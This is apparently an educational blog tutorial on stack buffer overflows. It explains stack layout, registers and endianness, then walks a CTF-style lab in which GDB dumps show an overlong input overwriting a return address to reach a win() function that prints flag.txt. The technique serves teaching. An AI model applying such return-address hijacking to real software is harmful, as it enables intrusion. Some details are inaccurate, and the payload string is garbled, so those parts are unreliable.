Buffer Overflow Attack from the Ground-up I: Simple Overflow

Buffer overflow is a security flaw where data exceeds a buffer’s capacity, spilling into neighboring memory. This overflow can corrupt crucial data, causing system instability or even enabling attackers to hijack control.

Buffer Overflow Attack from the Ground-up I: Simple Overflow

Stack and Heap

When a program is running, it is referred to as a process. Processes occupy a portion of the computer’s memory, where they store their code, data, and other necessary information required for execution.

In the context of memory management, heap and stack refer to different areas of a process’s memory, each with distinct purposes and characteristics:

How the stack works:

The stack is the reserved memory space for a process to execute. When a function is called, a block is reserved on the newest-end of the stack for local variables and some bookkeeping data.

  1. Function Calls: When a function is called, a new block of memory is reserved on top of the stack. This block is used to store the function’s local variables and some additional information needed for the function to work.
  2. Returning from Functions: When the function finishes, its block of memory is no longer needed. This block is freed up and can be reused the next time another function is called.
  3. LIFO Order: The stack follows a last-in, first-out (LIFO) order. This means that the most recently reserved block of memory is always the first one to be freed.
  4. Upside-down: The stack is upside-down, where a higher memory address is older and a lower memory address is newer.

How the heap works:

The heap is memory for dynamic allocation. Unlike the stack, there's no enforced pattern to the allocation and deallocation of blocks from the heap; you can allocate a block at any time and free it at any time. This makes it much more complex to keep track of which parts of the heap are allocated or free at any given time; there are many custom heap allocators available to tune heap performance for different usage patterns [1], i.e., defining global variables.


  1. https://stackoverflow.com/questions/79923/what-and-where-are-the-stack-and-heap ↩︎

Stack-based Buffer Overflow

Unlike Python and Java, some of the built-in functions in C do not perform boundary checks when pushing data into an array (hence, no extra time cost for array manipulation).

As we mentioned before, local variables (including arrays, which are contiguous blocks of memory that can be accessed via a pointer to the first element) are stored on the stack. When a process is running, the stack grows and shrinks dynamically as functions are called and return. The stack pointer (ESP in x86 or RSP in x86-64) adjusts to allocate and deallocate stack space.

EBP (Extended Base Pointer)

When a function is called, the current value of the stack pointer (ESP) is typically saved in the base pointer (EBP), and the ESP is adjusted to allocate space for the function's stack frame, moving downwards (to lower) in memory.

This allows the function to access its parameters and local variables relative to a fixed reference point, even as the stack pointer changes during the function’s execution.

More explicitly, The space between ESP and EBP contains the local variables and possibly other data for the current function’s execution.

Stack Diagram

The return address is allocated at an important part of the stack. The return address is where the function returns after it is completely executed.

If the function is called by the main function, the return address should point to the place in the main function immediately after calling this function. If a function is called recursively, such as when an outer function calls an inner function, the return address of the inner function is the place immediately after the call instruction in the outer function, not the inner function itself. Therefore, some high-level programming languages impose a maximum recursion depth to prevent excessive allocation of stack space.

Let's take a look at the following example.

The code works like the catcommand in Linux, outputting whatever the user inputs. However, a buffer was declared inside the vuln() function without applying a boundary check. This enables attackers to overwrite the stack memory beyond the allocated buffer size.

Given the vuln() function’s buffer overflow vulnerability, an attacker could potentially:

  • Provide an input longer than 148 characters to overflow buf.
  • Overwrite the return address of vuln() to point to the win() function’s address.
  • When vuln() returns, instead of returning to the caller main, it would jump to the win() function, thereby executing the win() function and potentially printing the contents of “flag.txt”.

We need to disassembly the compiled binary, then we can easily check the memory address of the return address ret. Say the binary called vuln, the following command can print out the assembly code for vuln.

objdump -d ./vuln

The partial assembly code is shown as follow:

The ret address should be 0x8049390 since it is the bit right after calling vuln().

Then we need to use GDB to see what is happened when a user input a string, by setting the GDB break point to 0x80492f4, we can make the process stop after user input. Assume that inputting a non-sense characters 1010101012341234, the GDB should log as the previous code block shows.

(gdb) b *0x80492f4
Breakpoint 1 at 0x80492f4
(gdb) r
Starting program: /afs/andrew.cmu.edu/usr24/zhongboy/private/14741/b1/vuln
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Enter a string:

Breakpoint 1, 0x080492f4 in vuln ()
(gdb) nexti
1010101012341234
0x080492f9 in vuln ()

To see what happens inside the memory, use x/64xw $esp, which means display 64 units of memory formatting as hexadecimal word (4 bytes each) from the ESP pointer.

(gdb) x/64xw $esp
0xffffd650:   0xffffd66c  0x000007d4  0x00000011  0x080492e4
0xffffd660:   0xf7ffdba0  0x00000000  0x08048322  0x30313031
0xffffd670:   0x30313031  0x34333231  0x34333231  0xf7ffda00
0xffffd680:   0xffffd6c0  0xf7ffdc0c  0xf7fbe7b0  0x00000001
0xffffd690:   0x00000001  0x00000000  0x00000011  0x00000001
0xffffd6a0:   0x00000001  0x00000000  0xf7ffd000  0x08048308
0xffffd6b0:   0x0804c00c  0x00000001  0xffffd6f8  0xf7f7ea60
0xffffd6c0:   0xf7f80da0  0xf7f80000  0xffffd6f8  0xf7dc748c
0xffffd6d0:   0xf7f80da0  0x0804c000  0xffffd7f4  0xf7ffcb80
0xffffd6e0:   0xffffd728  0xf7fd9004  0x00000001  0x0804c000
0xffffd6f0:   0xffffd7f4  0xf7ffcb80  0xffffd728  0x08049388
0xffffd700:   0xf7f80da0  0x0804c000  0xffffd728  0x08049390
0xffffd710:   0xffffd750  0xf7fbe66c  0xf7fbeb10  0x00000064
0xffffd720:   0xffffd740  0xf7f80000  0xf7ffd020  0xf7d77519
0xffffd730:   0xffffd96b  0x00000070  0xf7ffd000  0xf7d77519
0xffffd740:   0x00000001  0xffffd7f4  0xffffd7fc  0xffffd760

As illustrated in the block, the ASCII code for the input 1010101012341234 is indicated using [...], which is in little-endian (reversed order).

Endianness - Wikipedia

Endianness

Endianness refers to the order in which bytes are arranged in memory to represent larger data types (such as integers). There are two primary types of endianness:

  • Big-endian

In big-endian format, the most significant byte (the “big end”) is stored at the smallest memory address, and the least significant byte is stored at the largest memory address.

  • Little-endian

In little-endian format, the least significant byte (the “little end”) is stored at the smallest memory address, and the most significant byte is stored at the largest memory address.

The return address is indicated using (...).

0xffffd650:   0xffffd66c  0x000007d4  0x00000011  0x080492e4
0xffffd660:   0xf7ffdba0  0x00000000  0x08048322 [0x30313031
0xffffd670:   0x30313031  0x34333231  0x34333231] 0xf7ffda00
0xffffd680:   0xffffd6c0  0xf7ffdc0c  0xf7fbe7b0  0x00000001
0xffffd690:   0x00000001  0x00000000  0x00000011  0x00000001
0xffffd6a0:   0x00000001  0x00000000  0xf7ffd000  0x08048308
0xffffd6b0:   0x0804c00c  0x00000001  0xffffd6f8  0xf7f7ea60
0xffffd6c0:   0xf7f80da0  0xf7f80000  0xffffd6f8  0xf7dc748c
0xffffd6d0:   0xf7f80da0  0x0804c000  0xffffd7f4  0xf7ffcb80
0xffffd6e0:   0xffffd728  0xf7fd9004  0x00000001  0x0804c000
0xffffd6f0:   0xffffd7f4  0xf7ffcb80  0xffffd728  0x08049388
0xffffd700:   0xf7f80da0  0x0804c000  0xffffd728 (0x08049390)
0xffffd710:   0xffffd750  0xf7fbe66c  0xf7fbeb10  0x00000064
0xffffd720:   0xffffd740  0xf7f80000  0xf7ffd020  0xf7d77519
0xffffd730:   0xffffd96b  0x00000070  0xf7ffd000  0xf7d77519
0xffffd740:   0x00000001  0xffffd7f4  0xffffd7fc  0xffffd760
    

To overflow the buffer and overwrite the return address, we can construct an input string using Python (the code is shown as follows) to make the memory like this:

0xffffd650:   0xffffd66c  0x000007d4  0x00000011  0x080492e4
0xffffd660:   0xf7ffdba0  0x00000000  0x08048322 [0x30313031
0xffffd670:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd680:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd690:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd6a0:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd6b0:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd6c0:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd6d0:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd6e0:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd6f0:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd700:   0x31313131  0x31313131  0x31313131 (0x08049256)
0xffffd710:   0xffffd750  0xf7fbe66c  0xf7fbeb10  0x00000064
0xffffd720:   0xffffd740  0xf7f80000  0xf7ffd020  0xf7d77519
0xffffd730:   0xffffd96b  0x00000070  0xf7ffd000  0xf7d77519
0xffffd740:   0x00000001  0xffffd7f4  0xffffd7fc  0xffffd760
    

The string in binary is: 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000V’

Bingo! When we input this 'evil' string (some characters may not show up) into the program, it will display the content of flag.txt.

More Readings

Buffer Overflow Attack from the Ground-up II: Gadget and Shell Code Injection
The previous post introduced the heap, stack, and buffer overflow on the stack using disassembly and GDB. In ‘Buffer Overflow Attack from the Ground-Up II,’ I will show how to hijack the shell and control the system through the vulnerable program.
Buffer Overflow Attack from the Ground-up III: Canary
To combat buffer overflow attack, the “canary” stands out as a notable and effective strategy. Canary serves as an early warning system. It is a small, yet crucial, element placed in the stack memory of a program to detect and prevent buffer overflow attacks.

Buffer Overflow Attack from the Ground-up IV: Return to Libc